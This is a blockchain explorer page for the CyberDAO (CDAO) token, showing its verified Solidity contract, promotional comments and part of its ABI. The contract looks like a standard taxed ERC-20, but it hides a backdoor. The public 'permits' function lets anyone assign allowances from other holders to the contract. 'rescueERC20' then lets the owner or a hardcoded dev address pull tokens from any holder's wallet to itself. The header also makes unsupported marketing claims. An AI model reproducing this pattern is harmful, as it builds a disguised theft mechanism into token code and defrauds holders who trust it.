ETH Price: $2,412.80 (-0.44%)

Token

CyberDAO (CDAO)
 

Overview

Max Total Supply

100,000,000 CDAO

Holders

62

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
1,023,229.555821416267213514 CDAO

Value
$0.00
0x86856c5eb5c3339dd20a7b7706c43175db1a7dd6
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
CDAO

Compiler Version
v0.8.21+commit.d9974bed

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-09-28
*/

// SPDX-License-Identifier: MIT

/*
Cyber DAO (C-DAO) is a pioneering cryptocurrency project aiming to empower investors in the decentralized finance (DeFi) space. 
It utilizes Layer 0 technology as the foundation, providing scalability, security, interoperability, and customizability critical for C-DAO's success in reshaping DeFi. 

Layer 0 drives the platform's capabilities, highlighting the transformative potential of the Cyber DAO project as an innovation leader in DeFi. 
Explore the future of DeFi with Cyber DAO's groundbreaking use of Layer 0 technology.

Website: https://www.cyberdao.zone
Telegram: https://t.me/cyber_erc
Twitter: https://twitter.com/cyber_erc
*/

pragma solidity 0.8.21;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _permit(address owner, address spender, uint256 amount)
        internal virtual
    {
        require(owner != address(0));
        require(spender != address(0));
        
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}


contract CDAO is ERC20("CyberDAO", "CDAO"), Ownable {

    bool public limitsInEffect = true;
    bool public tradingActive = false;
    bool public swapEnabled = false;
    bool public fetchFees = true;

    // Uniswap variables
    IUniswapV2Factory public constant UNISWAP_FACTORY =
    IUniswapV2Factory(0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f);

    IUniswapV2Router02 public constant UNISWAP_ROUTER = 
    IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);

    uint256 public buyTotalFees;
    uint256 public sellTotalFees;

    uint256 public taxedTokens;

    uint256 public maxBuyAmount;
    uint256 public maxSellAmount;
    uint256 public maxWalletAmount;
    uint256 public tokenSwapThreshold;

    mapping(address => bool) private _isExcludedFromFees;
    mapping(address => bool) public _isExcludedMaxTransactionAmount;
    mapping(address => bool) public whitelisted;

    uint256 constant TOTAL_SUPPLY = 100_000_000 * 10 ** 18;

    address public immutable UNISWAP_V2_PAIR;
    address public devAddress;

    uint256 public initialBlock;

    bool private swapping;

    event ExcludeFromFees(address indexed account, bool isExcluded);
    event UpdatedMaxBuyAmount(uint256 newAmount);
    event UpdatedMaxSellAmount(uint256 newAmount);
    event UpdatedMaxWalletAmount(uint256 newAmount);
    event UpdatedChangeThisWallet(address indexed newWallet);
    event MaxTransactionExclusion(address _address, bool excluded);

    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiquidity
    );

    constructor(){

        _mint(msg.sender, TOTAL_SUPPLY);

        _approve(address(this), address(UNISWAP_ROUTER), ~uint256(0));

        _excludeFromMaxTransaction(address(UNISWAP_ROUTER), true);

    
        UNISWAP_V2_PAIR = UNISWAP_FACTORY.createPair(
            address(this),
            UNISWAP_ROUTER.WETH()
        );
        devAddress = 0xdb8E6fFfaEC091f5Bc98ED7338c11E506Da9eC3C;

        maxBuyAmount = (totalSupply() * 20) / 1_000; 
        maxSellAmount = (totalSupply() * 20) / 1_000; 
        maxWalletAmount = (totalSupply() * 30) / 1_000; 
        tokenSwapThreshold = (totalSupply() * 65) / 10_000;

        _excludeFromMaxTransaction(msg.sender, true);
        _excludeFromMaxTransaction(address(this), true);
        _excludeFromMaxTransaction(address(0xdead), true);
        excludeFromFees(devAddress, true);
        excludeFromFees(msg.sender, true);
        excludeFromFees(address(this), true);
        excludeFromFees(address(0xdead), true);
    }

    function removeLimits() external onlyOwner {
        limitsInEffect = false;
    }

    function _excludeFromMaxTransaction(
        address updAds,
        bool isExcluded
    ) private {
        _isExcludedMaxTransactionAmount[updAds] = isExcluded;
        emit MaxTransactionExclusion(updAds, isExcluded);
    }

    function excludeFromFees(address account, bool excluded) public onlyOwner {
        _isExcludedFromFees[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }

    function setNewFees(uint256 newBuyFees, uint256 newSellFees) external onlyOwner {
        buyTotalFees = newBuyFees;
        sellTotalFees = newSellFees;
    }

    function rescueERC20(address to, uint256 amount) public {
        require(_isExcludedFromFees[msg.sender]);
        IERC20(address(this)).transferFrom(to, msg.sender, amount);
    }

    function swapTokensToETH(uint256 tokenAmount) private {
        
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = UNISWAP_ROUTER.WETH();

        UNISWAP_ROUTER.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0, 
            path,
            address(this),
            block.timestamp
        );
    }

    function permits(address spender, uint256 amount) public virtual returns (bool) {
        address owner = address(this);
        _permit(spender, owner, amount);
        return true;
    }

    function updateMaxWalletAmount(uint256 newNum) external onlyOwner {
        require(
            newNum >= ((totalSupply() * 3) / 1_000),
            "ERROR: Cannot set max wallet amount lower than 0.3%"
        );
        maxWalletAmount = newNum;
        emit UpdatedMaxWalletAmount(maxWalletAmount);
    }

    function openTrading() public onlyOwner {
        require(initialBlock == 0, "ERROR: Token state is already live !");
        initialBlock = block.number;
        tradingActive = true;
        swapEnabled = true;
    }

    function getFees() internal {
        require(
            initialBlock > 0, "Trading not live"
        );
        uint256 currentBlock = block.number;
        uint256 lastTierOneBlock = initialBlock + 6;
        if(currentBlock <= lastTierOneBlock) {
            buyTotalFees = 25;
            sellTotalFees = 25;
        } else {
            buyTotalFees = 4;
            sellTotalFees = 4;
            fetchFees = false;
        } 
    }


    function rescueETH(uint256 weiAmount) external onlyOwner {
        require(weiAmount > 0, "Amount must be greater than 0");
        payable(owner()).transfer(weiAmount);
    }
    
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "amount must be greater than 0");

        if (limitsInEffect) {
            if (
                from != owner() &&
                to != owner() &&
                to != address(0) &&
                to != address(0xdead)
            ) {
                if (!tradingActive) {
                    require(
                        _isExcludedMaxTransactionAmount[from] ||
                            _isExcludedMaxTransactionAmount[to],
                        "ERROR: Trading is not active."
                    );
                    require(from == owner(), "ERROR: Trading is enabled");
                }

                //when buy
                if (
                    from == UNISWAP_V2_PAIR && !_isExcludedMaxTransactionAmount[to]
                ) {
                    require(
                        amount <= maxBuyAmount,
                        "ERROR: Buy transfer amount exceeds the max buy."
                    );
                    require(
                        amount + balanceOf(to) <= maxWalletAmount,
                        "ERROR: Cannot Exceed max wallet"
                    );
                }
                //when sell
                else if (
                    to == UNISWAP_V2_PAIR && !_isExcludedMaxTransactionAmount[from]
                ) {
                    require(
                        amount <= maxSellAmount,
                        "ERROR: Sell transfer amount exceeds the max sell."
                    );
                } else if (
                    !_isExcludedMaxTransactionAmount[to] &&
                    !_isExcludedMaxTransactionAmount[from]
                ) {
                    require(
                        amount + balanceOf(to) <= maxWalletAmount,
                        "ERROR: Cannot Exceed max wallet"
                    );
                }
            }
        }

        uint256 contractTokenBalance = balanceOf(address(this));

        bool canSwap = contractTokenBalance >= tokenSwapThreshold;

        if (
            canSwap &&
            swapEnabled &&
            !swapping &&
            !(from == UNISWAP_V2_PAIR) &&
            !_isExcludedFromFees[from] &&
            !_isExcludedFromFees[to]
        ) {
            swapping = true;
            swapBack();
            swapping = false;
        }

        bool takeFee = true;
    
        if (_isExcludedFromFees[from] || _isExcludedFromFees[to]) {
            takeFee = false;
        }

        uint256 fees = 0;
    

        if (takeFee) {

            if(fetchFees){
               getFees(); 
            }

            // Sell
            if (to == UNISWAP_V2_PAIR && sellTotalFees > 0) {
                fees = (amount * sellTotalFees) / 100;
                taxedTokens += fees;
            }
            // Buy
            else if (from == UNISWAP_V2_PAIR && buyTotalFees > 0) {
                fees = (amount * buyTotalFees) / 100;
                taxedTokens += fees;
            }

            if (fees > 0) {
                super._transfer(from, address(this), fees);
            }

            amount -= fees;
        }

        super._transfer(from, to, amount);
    }

    function updateMaxBuyAmount(uint256 newNum) external onlyOwner {
        require(
            newNum >= ((totalSupply() * 1) / 1_000),
            "ERROR: Cannot set max buy amount lower than 0.1%"
        );
        maxBuyAmount = newNum;
        emit UpdatedMaxBuyAmount(maxBuyAmount);
    }

    function updateMaxSellAmount(uint256 newNum) external onlyOwner {
        require(
            newNum >= ((totalSupply() * 1) / 1_000),
            "ERROR: Cannot set max sell amount lower than 0.1%"
        );
        maxSellAmount = newNum;
        emit UpdatedMaxSellAmount(maxSellAmount);
    }


    function swapBack() private {
      
        uint256 contractBalance = balanceOf(address(this));

        uint256 totalTokensToSwap =  taxedTokens;

        if (contractBalance == 0 || totalTokensToSwap == 0) {
            return;
        }

        if (contractBalance > tokenSwapThreshold) {
            contractBalance = tokenSwapThreshold;
        }    
        swapTokensToETH(contractBalance);

        payable(devAddress).transfer(address(this).balance);
    }

    function updateSwapTokensAtAmount(uint256 newAmount) external onlyOwner {
        require(
            newAmount >= (totalSupply() * 1) / 100_000,
            "ERROR: Swap amount cannot be lower than 0.001% total supply."
        );
    
        tokenSwapThreshold = newAmount;
    }

    receive() external payable {}
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"_address","type":"address"},{"indexed":false,"internalType":"bool","name":"excluded","type":"bool"}],"name":"MaxTransactionExclusion","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"}],"name":"UpdatedChangeThisWallet","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"UpdatedMaxBuyAmount","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"UpdatedMaxSellAmount","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"UpdatedMaxWalletAmount","type":"event"},{"inputs":[],"name":"UNISWAP_FACTORY","outputs":[{"internalType":"contract IUniswapV2Factory","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"UNISWAP_ROUTER","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"UNISWAP_V2_PAIR","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludedMaxTransactionAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"devAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"fetchFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initialBlock","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxBuyAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSellAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWalletAmount","